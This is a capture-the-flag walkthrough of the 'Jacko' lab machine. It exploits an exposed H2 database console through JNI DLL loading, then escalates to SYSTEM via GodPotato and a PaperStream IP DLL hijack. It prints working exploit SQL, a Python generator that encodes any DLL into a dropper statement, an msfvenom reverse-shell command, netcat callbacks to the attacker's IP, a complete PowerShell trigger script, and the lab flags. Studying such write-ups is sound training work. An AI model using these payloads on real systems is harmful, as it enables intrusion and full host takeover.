Jacko
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.137.66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 21:04 EST
Nmap scan report for 192.168.137.66
Host is up, received echo-reply ttl 125 (0.26s latency).
Scanned at 2025-11-11 21:04:04 EST for 208s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8082/tcp open http syn-ack ttl 125 H2 database http console
| http-methods:
|_ Supported Methods: GET POST
|_http-title: H2 Console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
9092/tcp open XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
<snipped>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
HTTP (80):
Opening it in Firefox:

Only a static page (the bundled H2 documentation); its links confirm this is an H2 Database Engine installation.
HTTP (8082):
Let's browse to that port:

This is the H2 web console itself. It normally accepts connections only from localhost unless it is started with -webAllowOthers, so being able to reach it from our machine is a misconfiguration.
Clicking Connect:

The connection succeeds.
From here we can read and write files on the host and, depending on what Java tooling is present on the machine, execute system commands.
Read C:\Windows\win.ini with the FILE_READ function:

I then looked for ways to execute system commands. Many blog posts describe creating an alias that wraps a Java exec method (the CREATE ALIAS ... AS $$ ... $$ form, which takes inline Java source) and then calling it, but none of those worked for me:

It throws an error saying it cannot run the Java compiler: that technique compiles the Java source when the alias is defined, which needs a JDK, and this target only has a JRE (Java 8 Update 251 under C:\Program Files\Java\jre1.8, as the installed-programs list later shows).
I searched with searchsploit again:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ searchsploit h2 database
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
H2 Database - 'Alias' Arbitrary Code Execution | java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution | java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure | linux/webapps/45105.py
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow | multiple/remote/31010.sql
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
The first two entries rely on the same compile-based alias queries mentioned above, so they fail here for the same reason.
Exploitation:
Let's mirror the fourth one (49384), which does not need a compiler:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ searchsploit -m java/local/49384.txt
Exploit: H2 Database 1.4.199 - JNI Code Execution
URL: https://www.exploit-db.com/exploits/49384
Path: /usr/share/exploitdb/exploits/java/local/49384.txt
Codes: N/A
Verified: True
File Type: ASCII text, with very long lines (64895)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Jacko/49384.txt
Read it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ cat 49384.txt
# Exploit Title: H2 Database 1.4.199 - JNI Code Execution
# Exploit Author: 1F98D
# Original Author: Markus Wulftange
# Date: 28 April 2020
# Vendor Hompage: https://www.h2database.com/
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html
# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),<snipped>,'"'), 'ISO-8859-1', '', '', '', '', '');
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
As the comments say, the three steps are: the first query writes the native library to disk through CSVWRITE (the DLL bytes are embedded as a long list of CHAR() calls, snipped above), the second loads it into the H2 process with java.lang.System.load, and the third exposes the library's eval function as a SQL alias so we can evaluate a script expression from the console; the one above uses Runtime.exec to run whoami and returns its output.
Let's run the exploit queries in the console, starting with the CSVWRITE that drops the DLL:
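To see how the snipped first query is built, here is an added example (my code, not part of the original writeup or of exploit 49384) that encodes any DLL into the same CSVWRITE statement, so the trick can be reused with a different library such as an msfvenom-built one. It assumes the CSVWRITE parameter order shown in the exploit and uses illustrative file names; the doubling of 0x22 bytes is my own handling of double quotes inside the quoted identifier, which the snipped exploit line does not show.

```python
"""Generate the H2 CSVWRITE statement that drops a native library on disk.

Added example, not part of the original writeup or of exploit 49384: it
rebuilds the encoding behind the exploit's first (snipped) query so the same
trick can be used with any DLL, e.g. one built with msfvenom.

Why it works: CSVWRITE writes a header row (the column names) followed by the
data rows. With the field separator, field delimiter, escape character, null
string and line separator all set to '', and a query that returns a single
NULL in a column *named* after the DLL bytes, the only thing that reaches the
file is the column name. ISO-8859-1 maps every code point 0..255 back to one
byte, so the file is a bit-for-bit copy of the library.
"""
import re
import sys
from pathlib import Path

# Matches one CHAR(0xNN) call as emitted by char_list() (used for self-checks).
CHAR_CALL = re.compile(r"CHAR\(0x([0-9a-fA-F]{2})\)")

# Constructed sample: the first bytes of a DOS header with a double quote
# mixed in, to exercise the identifier escaping. Not a real DLL.
SAMPLE_HEADER = b'MZ\x90\x00\x03\x00"\x00'


def sql_string_literal(text: str) -> str:
    """Quote text as an H2 string literal; only the single quote needs doubling."""
    return "'" + text.replace("'", "''") + "'"


def char_list(payload: bytes) -> str:
    """Encode bytes as comma-separated H2 CHAR(0xNN) calls.

    The bytes end up inside a double-quoted identifier, where a literal
    double quote is written as two double quotes, so 0x22 is emitted twice.
    (This escaping is my addition; the exploit line on the page is snipped
    before any such byte would be visible.)
    """
    parts = []
    for b in payload:
        parts.append(f"CHAR(0x{b:02x})")
        if b == 0x22:
            parts.append("CHAR(0x22)")
    return ",".join(parts)


def csvwrite_statement(payload: bytes, remote_path: str) -> str:
    """Build the CSVWRITE statement that writes payload to remote_path on the H2 host."""
    inner = f"CONCAT('SELECT NULL \"', {char_list(payload)},'\"')"
    return (
        f"SELECT CSVWRITE({sql_string_literal(remote_path)}, {inner}, "
        "'ISO-8859-1', '', '', '', '', '');"
    )


def decode_statement(sql: str) -> bytes:
    """Recover the bytes a generated statement writes (inverse of char_list).

    Handy as a self-check before pasting a very long statement into the console.
    """
    raw = bytes(int(h, 16) for h in CHAR_CALL.findall(sql))
    return raw.replace(b'""', b'"')


def build_dropper(dll_path: str, remote_path: str, out_path: str) -> int:
    """Encode the DLL at dll_path into out_path and return the statement length."""
    payload = Path(dll_path).read_bytes()
    sql = csvwrite_statement(payload, remote_path)
    assert decode_statement(sql) == payload, "round-trip check failed"
    Path(out_path).write_text(sql, encoding="ascii")
    return len(sql)


if __name__ == "__main__":
    # Usage (file names are illustrative):
    #   python3 h2_dropper.py shell.dll 'C:\Windows\Temp\UninOldIS.dll' drop.sql
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <local dll> <remote path> <out.sql>")
    print(f"wrote {build_dropper(*sys.argv[1:])} characters of SQL to {sys.argv[3]}")
```

Each byte costs about eleven characters of SQL, which is why the exploit's one-liner is 64895 characters long for a small DLL; the round-trip check in build_dropper catches any mistake before the statement is sent to the console.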

Load the library:

Try to execute whoami:

Here we have command execution.
Now let's get a reverse shell. First I need to know which outbound ports the target can reach, so I start listeners on 80 and 443 and request them from the console:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:43:47] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:47] "GET / HTTP/1.1" 404 -
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.137.66 - - [11/Nov/2025 21:43:58] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:58] "GET / HTTP/1.1" 404 -
Both requests arrive, so the target can reach our host on 80 and 443; its outbound traffic is not limited to the ports nmap found open on the target itself.
Copy the netcat binary (nc64.exe) to our working directory and host it with the Python web server again:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Upload it to the target:

The console shows an error, but the web server log shows that the download went through:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:48:24] "GET /nc64.exe HTTP/1.1" 200 -
Now use that binary (saved on the target as nc.exe) to get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49970
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>whoami /all
whoami /all
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>powershell
powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.
The service runs with a stripped-down PATH, so I prepend the standard system directories so that tools such as whoami and powershell resolve:
C:\Program Files (x86)\H2\service>set PATH=C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;%PATH%
C:\Program Files (x86)\H2\service>cd \Users
C:\Users>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users> whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001
<snipped>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeImpersonatePrivilege is enabled, so the route I took to SYSTEM was the usual one: upload GodPotato, as in previous boxes:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
PS C:\Windows\Tasks> curl http://192.168.45.238/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 6:57 PM 57344 GodPotato-NET4.exe
-a---- 11/11/2025 6:48 PM 45272 nc.exe
PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.238 443"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15d86cff-e221-4cf5-baf8-3a7020297285\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0bd8-ffff-2605-ea55deb5a91f
[*] DCOM obj OXID: 0x2b8f8d96cb49424d
[*] DCOM obj OID: 0x6c0c63dc4e4e6abb
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4084
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 50009
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>set username
USERNAME=JACKO$
C:\Windows\system32>set computername
COMPUTERNAME=JACKO
USERNAME is JACKO$, the computer account: we are running as NT AUTHORITY\SYSTEM.
After finishing the box I found that there is a second way to escalate privileges.
Post-Exploitation:
See what programs are installed on our target:
PS C:\Windows\Tasks> Get-Package
Get-Package
Name Version Source ProviderName
---- ------- ------ ------------
H2 Programs
Microsoft OneDrive 19.232.1124.0012 Programs
Scanner Central Admin Agent 1.04.0026.23 Programs
Software Operation Panel Programs
Software Operation Panel 4.5.1024 msi
Microsoft Visual C++ 2017 R... 14.12.25810.0 Programs
Microsoft Visual C++ 2017 R... 14.12.25810.0 Programs
VMware Tools 10.3.10.12406962 C:\Program Files\VMware\VMwar... msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Java 8 Update 251 (64-bit) 8.0.2510.8 C:\Program Files\Java\jre1.8.... msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Scanner Central Admin Agent... 1.4.26.23 msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
PaperStream IP (TWAIN) 1.42.6 msi
Microsoft Visual C++ 2017 x... 14.12.25810 msi
Java Auto Updater 2.8.251.8 msi
The vulnerable program is PaperStream IP.
Its exact version is in the readme file under the TWAIN folder:
PS C:\> dir "Program Files (x86)"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 8:59 PM Common Files
d----- 4/27/2020 9:01 PM fiScanner
d----- 4/27/2020 8:59 PM H2
d----- 5/3/2022 6:22 PM Internet Explorer
d----- 3/18/2019 9:52 PM Microsoft.NET
d----- 4/27/2020 9:01 PM PaperStream IP
d----- 3/18/2019 11:20 PM Windows Defender
d----- 3/18/2019 9:52 PM Windows Mail
d----- 4/24/2020 9:50 AM Windows Media Player
d----- 3/18/2019 11:23 PM Windows Multimedia Platform
d----- 3/18/2019 10:02 PM Windows NT
d----- 3/18/2019 11:23 PM Windows Photo Viewer
d----- 3/18/2019 11:23 PM Windows Portable Devices
d----- 3/18/2019 9:52 PM WindowsPowerShell
PS C:\> dir "Program Files (x86)\PaperStream IP"
Directory: C:\Program Files (x86)\PaperStream IP
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 9:01 PM CommonCOM
d----- 4/27/2020 9:01 PM DemoMode
d----- 4/27/2020 9:01 PM FTGPTEDT
d----- 4/27/2020 9:01 PM PatchCode
d----- 4/27/2020 9:01 PM TWAIN
-a---- 5/22/2014 8:02 PM 72 SupportPageenu.url
PS C:\> dir "Program Files (x86)\PaperStream IP\TWAIN"
Directory: C:\Program Files (x86)\PaperStream IP\TWAIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2020 9:01 PM Profile
-a---- 1/28/2016 10:22 AM 11658 Licenseenu.rtf
------ 7/11/2016 6:32 PM 3241739 PSIP0401.chm
------ 7/7/2016 3:40 AM 3315469 PSIP0404.chm
------ 7/6/2016 10:41 PM 3479268 PSIP0407.chm
------ 7/4/2016 11:51 PM 3544174 PSIP0409.chm
------ 7/12/2016 12:59 AM 3449511 PSIP040A.chm
------ 7/7/2016 1:13 AM 3424734 PSIP040C.chm
------ 7/6/2016 4:55 PM 3412543 PSIP0410.chm
------ 6/21/2016 9:13 PM 3868867 PSIP0411.chm
------ 7/5/2016 11:21 PM 3177961 PSIP0412.chm
------ 7/12/2016 5:21 PM 3406701 PSIP0416.chm
------ 7/7/2016 2:19 AM 3396546 PSIP0419.chm
------ 7/6/2016 11:21 PM 3394699 PSIP041F.chm
-a---- 7/4/2016 2:00 PM 17990 readmeenu.rtf
PS C:\> cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"
cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"
{\rtf1\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fnil\fcharset0 Microsoft Sans Serif;}{\f1\fswiss\fprq2\fcharset0 Microsoft Sans Serif;}}
{\colortbl ;\red0\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\nowidctlpar\sl276\slmult1\f0\fs18 ---------------------------------------------------------------------------------
------------------------\par
fi Series\par
PaperStream IP driver 1.42\par
README file\par
---------------------------------------------------------------------------------------------------------\par
Copyright PFU LIMITED 2013-2016\par
\par
\par
This file includes important notes on this product and also the additional information not included in the manuals.\par
\par
---------------------------------------------------------------------------------------------------------\par
<snipped>
Search for public exploits for PaperStream IP 1.42:

It is vulnerable to DLL hijacking: the FJTWSVIC service, when asked over its named pipe, loads UninOldIS.dll by searching the system PATH, so a DLL planted in any PATH directory writable by our user runs as SYSTEM.
Let's generate the DLL with msfvenom (it defaults to an x86 payload, which was enough here):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.238 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
Also save the exploit's PowerShell trigger script to a file (exploit.ps1) to transfer to the target. It locates a writable directory in the machine-wide PATH, copies the DLL there as UninOldIS.dll, then connects to the service's named pipe and sends the command that makes it load the DLL:
# Staged payload location; the DLL must be uploaded here first
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
if ((Test-Path $PayloadFile) -eq $false) {
    Write-Host "$PayloadFile not found, did you forget to upload it?"
    Exit 1
}
# Find a writable directory in the machine-wide PATH, read from the registry
# so it reflects what the SYSTEM service sees rather than our own session
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
    try {
        # Probe by creating and deleting a scratch file; the last writable entry wins
        [IO.File]::OpenWrite("$_\x.txt").close()
        Remove-Item "$_\x.txt"
        $WritableDirectory = $_
    } catch {}
}
if ($WritableDirectory -eq $null) {
    Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
    Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
# Plant the DLL under the name the service resolves through the PATH
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
# Connect to the service's named pipe and send the command that makes it load UninOldIS.dll
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
    $client.Connect()
    $reader = New-Object System.IO.StreamReader($client)
    $writer = New-Object System.IO.StreamWriter($client)
    $writer.AutoFlush = $true
    $writer.Write("ChangeUninstallString")
    $reader.ReadLine()
} finally {
    $client.Dispose()
}
Write-Host "Payload triggered"
Upload both the DLL and the script:
PS C:\> curl http://192.168.45.238/shell.dll -o "C:\Windows\Temp\UninOldIS.dll"
PS C:\> dir "C:\Windows\Temp\UninOldIS.dll"
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 7:30 PM 9216 UninOldIS.dll
PS C:\> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://192.168.45.238/exploit.ps1 -o exploit.ps1
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/11/2025 7:31 PM 1412 exploit.ps1
-a---- 11/11/2025 7:27 PM 45272 nc.exe
As the script expects, the DLL is staged at C:\Windows\Temp\UninOldIS.dll; the script itself copies it from there into whichever writable PATH directory it finds.
Before we launch the exploit I will start a nc listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
Run it:
PS C:\Windows\Tasks> .\exploit.ps1
.\exploit.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
Payload triggered
The service loaded our DLL from C:\JavaTemp\ and we get a shell as SYSTEM:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49791
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Get the flags:
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
8fc9d562b60b3040bf3d2309c796258a
C:\Windows\system32>type C:\Users\tony\Desktop\local.txt
7e1df7f9b4eabde99ccdd51364aaf40c